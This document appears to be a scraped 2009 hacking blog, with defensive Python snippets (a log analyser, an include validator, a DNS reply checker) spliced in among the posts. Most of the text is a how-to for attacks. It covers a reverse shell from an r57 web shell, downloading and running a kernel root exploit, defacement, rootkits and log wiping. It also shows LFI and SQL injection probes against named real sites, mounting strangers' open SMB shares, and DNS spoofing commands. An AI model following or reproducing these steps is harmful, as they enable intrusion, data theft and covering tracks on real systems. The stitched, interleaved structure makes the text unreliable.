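    "schema_enum": re.compile(r"information_schema\.", re.I),
}


def parse_line(line):
    """One log line -> dict with ip, path, decoded query, status, size; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    return {"ip": m["ip"], "path": parts.path, "query": unquote_plus(parts.query),
            "status": int(m["status"]), "size": 0 if m["size"] == "-" else int(m["size"])}


def signature_hits(query):
    """Names of the SIGNATURES that match the decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def shape(query):
    """Collapse every number (threshold, substring offset, row index) to 'N' so that
    all probes of one extraction loop map to the same shape."""
    return re.sub(r"\d+", "N", query)


def analyze(log_text, min_probes=3):
    """Per flagged source IP: signatures seen, the response-size classes of the flagged
    requests, and 'walks' (shape -> count) with at least min_probes distinct probes."""
    per_ip = defaultdict(lambda: {"signatures": set(), "walks": {}, "sizes": set()})
    by_shape = defaultdict(set)  # (ip, path, shape) -> distinct concrete queries
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["query"]:
            continue
        hits = signature_hits(rec["query"])
        if not hits:
            continue
        entry = per_ip[rec["ip"]]
        entry["signatures"].update(hits)
        entry["sizes"].add(rec["size"])
        by_shape[(rec["ip"], rec["path"], shape(rec["query"]))].add(rec["query"])
    for (ip, _path, shp), queries in by_shape.items():
        if len(queries) >= min_probes:
            per_ip[ip]["walks"][shp] = len(queries)
    return dict(per_ip)


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, sorted(entry["signatures"]), "walks:", list(entry["walks"].values()),
              "size classes:", sorted(entry["sizes"]))
```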
We will analyze the first
way, which is inside the shell (in our example the shell is r57).

Initially we open NetCat and set it to listen on a specific port (this port must
be correctly opened/forwarded in the NAT/firewall if we have a router) in the
following way:

We will type 11457 in the port input (this is the default port for the last versions
of the r57 shell). We can use another port as well.

We press in Windows Start -> Run -> and we type: cmd
Then we go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat responds: listening on [any] 11457 ...

On the main page of the r57 shell we find, under the menu :: Net ::, the
back-connect option. In the IP form we type our IP (www.cmyip.com to see our IP if
we have a dynamic one).

In the Port form we put the port that we opened and NetCat listens on.

If we press connect the shell will respond:

Now script try connect to <ip> port 11457 ...

If our settings are correct NetCat will give us a shell on the server.

Now we will continue to the rooting process.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root privileges on the box. Depending on the version
of the Linux kernel there are different exploits.
Sometimes the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of the 2.6.8 Linux kernel.
We will need the h00lyshit exploit.

Some sites where we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin'; you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder, which is a standard writable folder.

We type: cd /tmp

To download the local root exploit we can use a download command for Linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the URL of h00lyshit.

After the download we must compile the exploit (read the instructions of the exploit
before compiling).

For h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit <very>

We need a very big file on the disk in order to run it successfully and get root.

We must create a big file in /tmp or in another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation.

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can proceed to the last step.
We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(if we are in a different writable folder and the largefile is created in /tmp)

If there are no running errors (maybe the kernel is patched or something is wrong with
the exploit run or the large file) we will get root.

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or set up a rootkit (e.g.
SSHDoor) and take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

RoMeO
</pre>
.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com1tag:blogger.com,1999:blog-5375501825270350941.post-68969332582452679422009-07-06T23:55:00.000-07:002009-07-06T23:56:34.574-07:00
Local File Inclusion - LFI
<pre>[- How to Find LFI Vulnerability -]

How to find an LFI vulnerability: well, I use the method of adding ..
Example

www.site.com/index.php?p=..

Real World Examples:

http://www.jedit.org/index.php?page=..

Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line 63

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63

This is not vulnerable.
A vulnerable one should look like:

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62

include is the code the script is using, for example

<?php
$page = $_GET['page'];
include($page);
?>

should give [function.include],
but

<?php
$page = $_GET['page'];
require_once($page);
?>

should give [function.require_once] or [function.require].

[- Find Example (Real) -]

http://www.crew4sea.com/indexm.php?url=..

Gives us:

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear') in /indexm.php on line 164

[b][function.require][/b]

So we know it's vulnerable.

If it's a Windows OS, you can just do

http://www.crew4sea.com/indexm.php?url=indexm.php

Otherwise try
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd

until you get something.</pre>
.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com2tag:blogger.com,1999:blog-5375501825270350941.post-19214541917255438232009-07-02T09:44:00.001-07:002009-07-02T09:46:30.455-07:00
Angry IP Scan Hacked Ports
Angry IP Stripper...

I hate cutting and pasting IPs from Angry IP to my command prompt, or from my export of scanned IPs from Angry to cmd.
I looked at ways to speed up the process of doing the following command, "net view \\", without the need to go back and forth from one window to another 50 times to find a small list of IPs with open shares.

I asked around on a few different forums and someone gave me the key to make one command that strips Angry's export and outputs the IPs into CMD with the command net view \\ and does the crap work for me.

So now I can type one command or cut and paste one command to do 50 or whatever searches for open shares.

Here it is...

for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat

OK, let me explain a few things.

When Angry has finished scanning a range, I export the results to a .txt file; I might name it 1.txt or 2.txt.

Inside the txt file it looks like this
-------------------------------
This file was generated by Angry IP Scanner
Visit http://www.angryziber.com/ for the latest version


Scanned 217.81.105.1 - 217.81.255.255 (Ports: 5110,139,12345,23,445)
24/03/2008 11:59:28 PM

IP Ping Hostname Comp. Name Group Name User Name MAC Address TTL Open Ports

217.81.122.148 92 ms pD9517A94.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.128.1 994 ms pD9518001.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.136.236 327 ms pD95188EC.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.143.82 1806 ms pD9518F52.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.190.34 733 ms pD951BE22.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.209.185 651 ms N/A N/A N/A N/A N/A N/A 23
217.81.230.253 290 ms pD951E6FD.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.235.126 417 ms pD951EB7E.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.246.211 198 ms N/A N/A N/A N/A N/A N/A 23
217.81.248.34 387 ms pD951F822.dip.t-dialin.netCONNIPET N/A CONNIPET N/A N/A 139
217.81.250.37 331 ms pD951FA25.dip.t-dialin.netN/A N/A N/A N/A N/A 23
217.81.251.202 101 ms pD951FBCA.dip.t-dialin.netHOME-PC ARBEITSGRUPPE N/A N/A 50 139
217.81.255.60 128 ms pD951FF3C.dip.t-dialin.netN/A N/A N/A N/A N/A 139,445
-------------------------

I don't have to get Angry to save all this info; I just like looking at the different names to get a feel for what a system might have on it.

That export is saved to c:\ for example. I run cmd.exe, go to c:\, type dir and there it is.

I paste in the for command: for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat


I double check it's going to look in the correct txt file and also pick a name for the bat file (auto, 1, run); it doesn't matter what the .bat is called. Once I check and see the info is correct I hit enter...

Then I type the name of the .bat file and it's running by itself..

--------------------------
Ctrl-Break to stop the batch file running. Hit it 3 or 4 times and wait 10 seconds..

So for me it looks like this
-
C:\>for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat

C:\>1
C:\>net view \\217.81.122.148
System error 53 has occurred. <---(Most likely firewall)
The network path was not found.
C:\>net view \\217.81.128.1

-

The other thing I do is increase the command prompt height buffer so that all the information scrolling along doesn't get lost: right click command prompt, select properties, layout, increase screen buffer size height to 1000 or more depending on how many IPs you need to check.

Sit back and wait for it to go through the list; 50's a good number.
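Going back to the include() handlers shown in the LFI post above and the ?page= remote include used in the rooting post before it: both hand the page parameter to the include unchecked. As an added example that is not code from either post, this Python resolver shows the checks a page-selection handler needs to refuse both remote URLs and traversal; the pages directory, the allowed page names and the probe inputs are assumed or constructed here.

```python
from pathlib import Path
from urllib.parse import urlsplit

# Assumed site layout for this example: every includable page lives under
# PAGES_DIR and is named in ALLOWED; both values are made up here.
PAGES_DIR = Path("/var/www/site/pages")
ALLOWED = frozenset({"home", "news", "contact"})


class IncludeRejected(ValueError):
    """Raised with a short reason when a page parameter must not be included."""


def resolve_page(param, pages_dir=PAGES_DIR, allowed=ALLOWED):
    """Map the ?page= value to a file under pages_dir, or raise IncludeRejected."""
    if not param or len(param) > 64:
        raise IncludeRejected("empty or oversized")
    # Remote file inclusion: anything carrying a URL scheme (http://, ftp://, ...)
    # is refused; the same test also catches PHP stream wrappers, which include()
    # accepts just like http:// URLs.
    if urlsplit(param).scheme or param.startswith("//"):
        raise IncludeRejected("remote include")
    # Local file inclusion: traversal, absolute paths and NUL-byte truncation.
    if "\x00" in param or "/" in param or "\\" in param or ".." in param:
        raise IncludeRejected("path traversal")
    # Positive check: only names the application actually knows about.
    if param not in allowed:
        raise IncludeRejected("unknown page")
    # Defence in depth: the resolved path must still sit inside pages_dir.
    target = (pages_dir / (param + ".php")).resolve()
    if pages_dir.resolve() not in target.parents:
        raise IncludeRejected("escaped pages directory")
    return target


def verdicts(params):
    """Return {param: 'ok:' + path or 'rejected:' + reason} for each input."""
    out = {}
    for p in params:
        try:
            out[p] = "ok:" + str(resolve_page(p))
        except IncludeRejected as e:
            out[p] = "rejected:" + str(e)
    return out


# Constructed inputs: the probes from the two posts plus one legitimate value.
PROBES = [
    "news",
    "..",
    "/etc/passwd",
    "../etc/passwd",
    "indexm.php",
    "http://www.mysite.com/shells/evilscript.txt?",
    "news\x00.txt",
]

if __name__ == "__main__":
    for p, v in verdicts(PROBES).items():
        print(repr(p), "->", v)
```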
Once it's done, right click the screen, mark it all, right click it again and save it in Notepad, and check what you have to open up..
-
net view \\89.214.144.144
Shared resources at \\89.214.144.144
Sandra
Share name Type Used as Comment
-------------------------------------------------------------
C Disk
Enviar Para o OneNote 2007 Print Enviar Para o OneNote 2007
Fact2007 Disk
HP Photosmart 7400 Series Print HP Photosmart 7400 Series
I Disk
Public Disk
Users Disk
The command completed successfully.
-

(One scan brought up this list of drives on a share.)

c:\net use k: \\89.214.144.144\C
c:\The command completed successfully.
c:\net use L: \\89.214.144.144\Fact2007
c:\The command completed successfully
c:\net use M: \\89.214.144.144\I
c:\The command completed successfully

Now in my computer under network drives, I have 3 new shares to look at.

c on '89.214.144.144'
Fact2007 on '89.214.144.144'
I on '89.214.144.144'


Once you're done browsing don't forget to right click on these and disconnect, otherwise your system will run really slow.

Also, each time you run the for command and you don't change the name of your .bat file, new information is added to it instead of it being overwritten.
Why this is, I'm not sure; it just means the list will grow and it will take longer and longer to run a scan, so del *.bat before you run a new Stripper.

c:\edit *.bat, select shift-Arrow Down to select a portion to delete, is another option.
Edit also lets you look at what the bat looks like.
The start of the bat has a little junk in it while it's running.

---
C:\>1
C:\>net view \\This
System error 53 has occurred.
The network path was not found.
C:\>net view \\Visit
System error 53 has occurred.
The network path was not found.
C:\>net view \\Scanned
System error 53 has occurred.
The network path was not found.
C:\>net view \\24/03/2008
System error 123 has occurred.
The filename, directory name, or volume label syntax is incorrect.
C:\>net view \\IP
System error 53 has occurred.
The network path was not found.
C:\>net view \\217.81.99.29
-

Edit the bat file to remove the first couple of lines or just ignore it and let it run.

c:\for /?

Brings up all the help info on the "for" command. I never knew about it until I started asking about how to do this; I was expecting someone to write a perl script or something, but this just goes to show there's still a lot to learn inside Windows and all the little files that are within.

I hope you guys find this useful and a real time saver, and look at new ways to use the for command.

Regards RoMeO....
http://www.blogger.com/profile/11632901016120998126noreply@blogger.com1tag:blogger.com,1999:blog-5375501825270350941.post-19799932451203172582009-07-02T09:39:00.001-07:002009-07-02T09:39:56.099-07:00
Computer Acronyms (Basic)
Computer Acronyms, The List

ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft³/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Committed to Excellence)

--- D ---
DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ADSL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frames Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS - Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (James B. Lansing) Speakers
JVC - JVC Company of America

--- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Area Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB - MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Converter
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshielded Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology
.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-53974945280824975882009-07-02T09:36:00.001-07:002009-07-02T09:37:17.647-07:00
DNS Spoofing
What is DNS Spoofing?

DNS Spoofing is the art of making a DNS entry point to another IP than the one it is supposed to point to. To understand this better, let's see an example. You're in your web browser and wish to see the news on www.cnn.com; without thinking about it, you just enter this URL in your address bar and press enter.
Now, what's happening behind the scenes? Well...
basically, your browser is going to send a request to a DNS server to get the matching IP address for www.cnn.com; then the DNS server tells your browser the IP address of CNN, so your browser can connect to CNN's IP address and display the content of the main page.
Hold on a minute... You get a message saying that CNN's web site has closed because they don't have any more money to pay for their web site. You're so amazed, you call and tell that to your best friend on the phone; of course he's laughing at you, but to be sure, he goes to CNN's web site to check for himself.
You are surprised when he tells you he can see the news of the day as usual and you start to wonder what's going on. Are you sure you are talking to the right IP address? Let's check. You ask your friend to fire up his favorite DNS resolving tool and to give you the IP address he's getting for www.cnn.com. Once you've got it, you put it in your browser URL bar:

http://212.153.32.65

You feel ridiculous and frustrated when you see CNN's web page with its daily news.
Well, you've just been the witness of a DNS hijacking scenario. You're wondering what happened: did the DNS server tell you the wrong IP address? Maybe...
At least this is the most obvious answer that comes to mind.
In fact there are two techniques for accomplishing this DNS hijacking. Let's see the first one, the "DNS ID Spoofing" technique.

1) DNS Cache Poisoning

As you can imagine, a DNS server can't store information about all existing names/IPs on the net in its own memory space. That's why DNS servers have a cache; it enables them to keep a DNS record for a while.
In fact, a DNS server has records only for the machines of the domain it has authority over; if it needs to know about machines outside its domain, it has to send a request to the DNS server which handles those machines, and since it doesn't want to ask all the time about records, it can store in its cache the replies returned by other DNS servers.
Now let's see how someone could poison the cache of our DNS server.
An attacker is running his own domain (attacker.net) with his own hacked DNS server (ns.attacker.net).
Note that I said hacked DNS server because the attacker customized the records in his own DNS server; for instance one record could be www.cnn.com=81.81.81.81
1) The attacker sends a request to your DNS server asking it to resolve www.attacker.net
2) Your DNS server is not aware of this machine's IP address; it doesn't belong to its domain, so it needs to ask the responsible name server.
3) The hacked DNS server replies to your DNS server, and at the same time gives it all its records (including its record concerning www.cnn.com). Note: this process is called a zone transfer.
4) The DNS server is now "poisoned". The attacker got his IP, but who cares; his goal was not to get the IP address of his web server but to force a zone transfer and leave your DNS server poisoned as long as the cache is not cleared or updated.
5) Now if you ask your DNS server about www.cnn.com's IP address it will give you 172.50.50.50, where the attacker runs his own web server. Or even simpler, the attacker could just run a bouncer forwarding all packets to the real web site and vice versa, so you would see the real web site, but all your traffic would be passing through the attacker's web site.

2) DNS ID Spoofing

We saw that when a machine X wants to communicate with a machine Y, the former always needs the latter's IP address. However, in most cases X only has the name of Y; in that case, the DNS protocol is used to resolve the name of Y into its IP address.
Therefore, a DNS request is sent to a DNS server declared at X, asking for the IP address of the machine Y.
Meanwhile, the machine X assigned a pseudo-random identification number to its request, which should be present in the answer from the DNS server. Then when the answer from the DNS server is received by X, it will just have to compare both numbers; if they're the same, the answer is taken as valid, otherwise it will simply be ignored by X.
Is this concept safe? Not completely. Anyone could lead an attack by getting this ID number. If you're for example on a LAN, someone who runs a sniffer could intercept DNS requests on the fly, see the request ID number and send you a fake reply with the correct ID number... but with the IP address of his choice. Then, without realizing it, the machine X will be talking to the IP of the attacker's choice thinking it's Y.

By the way, the DNS protocol relies on UDP for requests (TCP is used only for zone transfers), which means that it is easy to send a packet coming from a fake IP since there are no SYN/ACK numbers (unlike TCP, UDP doesn't provide a minimum of protection against IP spoofing).

Nevertheless, there are some limitations to accomplishing this attack.
In my example above, the attacker runs a sniffer, intercepts the ID number and replies to his victim with the same ID number and with a reply of his choice.
On the other hand, even if the attacker intercepted your request, it will be transmitted to the DNS server anyway, which will also reply to the request (unless the attacker is blocking the request at the gateway or carries out ARP cache poisoning, which would make the attack possible on a switched network, by the way).
That means that the attacker has to reply BEFORE the real DNS server, which means that to succeed in this attack, the attacker MUST be on the same LAN so as to have a very quick ping to your machine, and also to be able to capture your packets.

Practical example (for testing purposes ONLY)
To see for yourself how to hijack a connection from a machine on your local area network, we can do the following:
First step: Poison the ARP cache of the victim's machine (tools and explanations for realizing this task can be found at http://www.arp-sk.org)
Second step: Now, outgoing packets of the target will be redirected to your host, but you have to forward the traffic to the real gateway; this can be achieved with a tool like Winroute Pro.
Third step: We then use WinDNSSpoof, developed by valgasu (www.securiteinfo.org), which is a tool that greatly helps to carry out DNS ID Spoofing. (Before using this tool be sure you have the Winpcap library installed on your machine, see http://winpcap.polito.it.) We run it in the cmd like:
wds -n www.cnn.com -i 123.123.123.123 -g 00-C0-26-DD-59-CF -v
This will make www.cnn.com point to 123.123.123.123 on the victim's machine, 00-C0-26-DD-59-CF being the MAC address of the gateway or DNS server.
.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-16160708820903556712009-06-27T06:00:00.000-07:002009-06-27T06:01:04.885-07:00
Database Encoding
Hey guys,

This is just a little piece of information I want to show to you all here. It's about the database character encoding used on the server. As you know, there are lots of character encoding methods used by webmasters out there such as UTF-8, latin1, etc. Each of the encoding techniques has its effective way of showing characters on the client machine. What does that mean?

Okay, suppose that we have a webserver with a latin1-encoded database. Latin1 will support characters from the Americas, Western Europe, Oceania, and much of Africa. The client user will get characters/output from the webserver normally. But what if the client is from East Asia?
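The ID check described in the DNS ID Spoofing section above, together with the source-port and owner-name checks a resolver adds to it, as an added Python example that is not part of the original post: packets are built inline in real DNS wire format, the www.attacker.net address 198.51.100.10 is constructed, and nothing is sent on the network. It replays the post's own cases: the correct reply, a forged reply with a guessed ID, a reply to the wrong port, and the cache-poisoning reply that carries an extra www.cnn.com record.

```python
import os
import struct


def encode_name(name):
    """Dotted host name -> DNS wire-format label sequence (no compression)."""
    labels = [lbl.encode() for lbl in name.strip(".").split(".")]
    return b"".join(bytes([len(l)]) + l for l in labels) + b"\x00"


def parse_name(data, off):
    """Decode a name at offset off (following compression pointers).
    Returns (lower-cased dotted name, offset just past the name field)."""
    labels, end, jumped = [], None, False
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:               # 2-byte compression pointer
            if not jumped:
                end = off + 2
            off, jumped = struct.unpack_from("!H", data, off)[0] & 0x3FFF, True
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode())
        off += length
    return ".".join(labels).lower(), end if jumped else off


def build_query(txid, name, qtype=1):
    """Header (ID, RD set, QDCOUNT=1) followed by one question for an A record."""
    return (struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
            + encode_name(name) + struct.pack("!HH", qtype, 1))


def build_response(txid, qname, records, ttl=300):
    """Response echoing the question plus A records given as [(owner_name, ipv4), ...]."""
    pkt = struct.pack("!HHHHHH", txid, 0x8180, 1, len(records), 0, 0)
    pkt += encode_name(qname) + struct.pack("!HH", 1, 1)
    for owner, ip in records:
        rdata = bytes(int(octet) for octet in ip.split("."))
        pkt += encode_name(owner) + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return pkt


def new_query(name):
    """Client side: random 16-bit ID and a random ephemeral source port."""
    txid = struct.unpack("!H", os.urandom(2))[0]
    sport = 1024 + struct.unpack("!H", os.urandom(2))[0] % (65536 - 1024)
    return {"txid": txid, "sport": sport, "name": name.lower()}, build_query(txid, name)


def accept_reply(pending, packet, to_port):
    """Validate a UDP reply against the pending query.
    Returns (False, reason) or (True, [ipv4 answers for the queried name])."""
    if to_port != pending["sport"]:
        return False, "wrong destination port"
    txid, flags, qdcount, ancount = struct.unpack_from("!HHHH", packet, 0)
    if txid != pending["txid"]:
        return False, "transaction ID mismatch"
    if not flags & 0x8000:
        return False, "not a response"
    if qdcount != 1:
        return False, "unexpected question count"
    qname, off = parse_name(packet, 12)
    qtype, qclass = struct.unpack_from("!HH", packet, off)
    off += 4
    if (qname, qtype, qclass) != (pending["name"], 1, 1):
        return False, "question mismatch"
    addrs = []
    for _ in range(ancount):
        owner, off = parse_name(packet, off)
        rtype, rclass, _ttl, rdlen = struct.unpack_from("!HHIH", packet, off)
        off += 10
        rdata = packet[off:off + rdlen]
        off += rdlen
        # Only A records for the name we asked about are used. A record for any
        # other name (the www.cnn.com entry riding along in the post's zone-transfer
        # scenario) is out of bailiwick and is dropped instead of cached.
        if owner == pending["name"] and (rtype, rclass, rdlen) == (1, 1, 4):
            addrs.append(".".join(str(b) for b in rdata))
    return True, addrs


def spoof_search_space(random_source_port):
    """Guesses a blind spoofer must cover: the 16-bit ID alone, or ID x ephemeral ports."""
    return 65536 * ((65536 - 1024) if random_source_port else 1)


def demo():
    """Replay the post's cases against the checks above."""
    cnn, _ = new_query("www.cnn.com")
    legit = build_response(cnn["txid"], "www.cnn.com", [("www.cnn.com", "212.153.32.65")])
    forged = build_response((cnn["txid"] + 1) & 0xFFFF, "www.cnn.com",
                            [("www.cnn.com", "123.123.123.123")])
    # Cache-poisoning scenario: the answer for www.attacker.net also carries the
    # attacker's www.cnn.com record. 198.51.100.10 is a constructed address.
    atk, _ = new_query("www.attacker.net")
    smuggled = build_response(atk["txid"], "www.attacker.net",
                              [("www.attacker.net", "198.51.100.10"),
                               ("www.cnn.com", "81.81.81.81")])
    return {
        "legit": accept_reply(cnn, legit, cnn["sport"]),
        "forged_id": accept_reply(cnn, forged, cnn["sport"]),
        "wrong_port": accept_reply(cnn, legit, cnn["sport"] ^ 1),
        "out_of_bailiwick": accept_reply(atk, smuggled, atk["sport"]),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:17} -> {result}")
    print("blind guesses, fixed port:", spoof_search_space(False))
    print("blind guesses, random port:", spoof_search_space(True))
```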
Sure, the latin1 encoding technique won't support it. So, what is the relation between latin1 encoding and database SQL?

Well guys...

#1. Let's take one sample vulnerable web:

http://www.iptek.net.id/ind/?mnu=1&ch=berita&id=-659 union all select 1,2,3,4,5,6,7,8,9,10/*

#2. Check the database version

http://www.iptek.net.id/ind/?mnu=1&ch=berita&id=-659 union all select 1,2,3,version(),5,6,7,8,9,10/*

Look!!
Nothing appears on the screen. Why?
This is because the webserver is using another encoding instead of UTF-8. How do we know that it uses UTF-8 for encoding?
I just guess, since UTF-8 is generally used by most webservers out there. And how do we resolve this?

#3. Use another character encoding

http://www.iptek.net.id/ind/?mnu=1&ch=berita&id=-659 union all select 1,2,3,convert(version() using latin1),5,6,7,8,9,10/*

Why should we use latin1 and not another character encoding?
Because latin1 is the previous character encoding developed on SQL (version 3/4) before UTF-8. So, we can guess from here that latin1 must be used instead of UTF-8.

#4. Yuppy... now the database version can be read on the screen.

Most SQL injectors usually forget about this technique. So, I hope you won't forget this after you read my article.
Cheers Liamo. :)
.http://www.blogger.com/profile/11632901016120998126noreply@blogger.com0tag:blogger.com,1999:blog-5375501825270350941.post-6864337796533007832009-06-27T05:58:00.000-07:002009-06-27T05:59:25.381-07:00
Shellcodes - How They Work?
It's not an easy task to find a vulnerable service and find an exploit for it. It's also not easy to defend against users who might want to exploit your system, if you are a system administrator.
